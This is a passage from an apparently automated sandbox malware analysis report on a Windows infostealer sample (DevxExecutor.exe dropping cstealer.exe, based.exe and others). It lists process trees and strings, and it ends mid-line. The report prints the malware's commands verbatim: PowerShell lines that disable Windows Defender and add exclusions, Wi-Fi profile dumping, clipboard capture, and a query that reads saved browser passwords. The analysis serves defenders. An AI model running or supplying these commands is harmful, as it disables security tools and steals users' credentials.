                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A804D2609_2_00007FF8A804D260
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80342879_2_00007FF8A8034287
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80344C69_2_00007FF8A80344C6
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80353A89_2_00007FF8A80353A8
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8035F0B9_2_00007FF8A8035F0B
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80355109_2_00007FF8A8035510
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803560F9_2_00007FF8A803560F
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80354CA9_2_00007FF8A80354CA
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8033A8F9_2_00007FF8A8033A8F
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80315C89_2_00007FF8A80315C8
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80354CF9_2_00007FF8A80354CF
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81715C09_2_00007FF8A81715C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8034AC59_2_00007FF8A8034AC5
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803542F9_2_00007FF8A803542F
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80350479_2_00007FF8A8035047
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80363899_2_00007FF8A8036389
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803655F9_2_00007FF8A803655F
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80312999_2_00007FF8A8031299
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8034F3E9_2_00007FF8A8034F3E
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803216C9_2_00007FF8A803216C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80321359_2_00007FF8A8032135
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80353C19_2_00007FF8A80353C1
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8B7E37A589_2_00007FF8B7E37A58
                                Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Chrome\updater.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\setup.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8032A04 appears 172 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A803483B appears 129 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8034D68 appears 34 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A7DA8810 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8036988 appears 51 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8036889 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A803300D appears 55 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF6957E2B10 appears 47 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A7DA9620 appears 175 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A7DCEF60 appears 40 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A80324B9 appears 83 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8031EF1 appears 1586 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8034057 appears 780 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A7DA89E0 appears 123 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8032734 appears 510 times
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: String function: 00007FF6D6E92B10 appears 47 times
                                Source: unicodedata.pyd.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                Source: unicodedata.pyd.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                Source: DevxExecutor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: libcrypto-1_1.dll.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
                                Source: python311.dll.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993579269724483
                                Source: unicodedata.pyd.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9937485999103942
                                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@191/263@5/4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957E8770 GetLastError,FormatMessageW,WideCharToMultiByte,3_2_00007FF6957E8770
                                Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exe
                                Source: C:\Users\user\Desktop\DevxExecutor.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DevxExecutor.exe.logJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8704:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8624:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1080:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8228:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
                                Source: C:\ProgramData\main.exeMutant created: \Sessions\1\BaseNamedObjects\CosturaA54E036D2DCD19384E8EA53862E0DD8F
                                Source: C:\Users\user\Desktop\DevxExecutor.exeMutant created: \Sessions\1\BaseNamedObjects\2tHCwnGTxPSY0oYKn
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8904:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9044:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8236:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
                                Source: C:\ProgramData\Microsoft\based.exeMutant created: \Sessions\1\BaseNamedObjects\d
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9124:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2272:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8736:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8352:120:WilError_03
                                Source: C:\Users\user\Desktop\DevxExecutor.exeFile created: C:\Users\user\AppData\Local\Temp\cstealer.exeJump to behavior
                                Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat
                                Source: DevxExecutor.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: DevxExecutor.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7796
                                Source: C:\Users\user\Desktop\DevxExecutor.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT action_url, username_value, password_value FROM logins;
                                Source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                Source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: cstealer.exe, cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: DevxExecutor.exeReversingLabs: Detection: 52%
                                Source: DevxExecutor.exeVirustotal: Detection: 53%
                                Source: main.exeString found in binary or memory: --help
                                Source: main.exeString found in binary or memory: --help
                                Source: main.exeString found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONNOUSERSITE :
                                Source: main.exeString found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONNOUSERSITE :
                                Source: main.exeString found in binary or memory: can't send non-None value to a just-started generator
                                Source: unknownProcess created: C:\Users\user\Desktop\DevxExecutor.exe "C:\Users\user\Desktop\DevxExecutor.exe"
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe"
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess created: C:\Users\user\AppData\Local\Temp\main.exe "C:\Users\user\AppData\Local\Temp\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\main.exeProcess created: C:\Users\user\AppData\Local\Temp\main.exe "C:\Users\user\AppData\Local\Temp\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()""
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeProcess created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 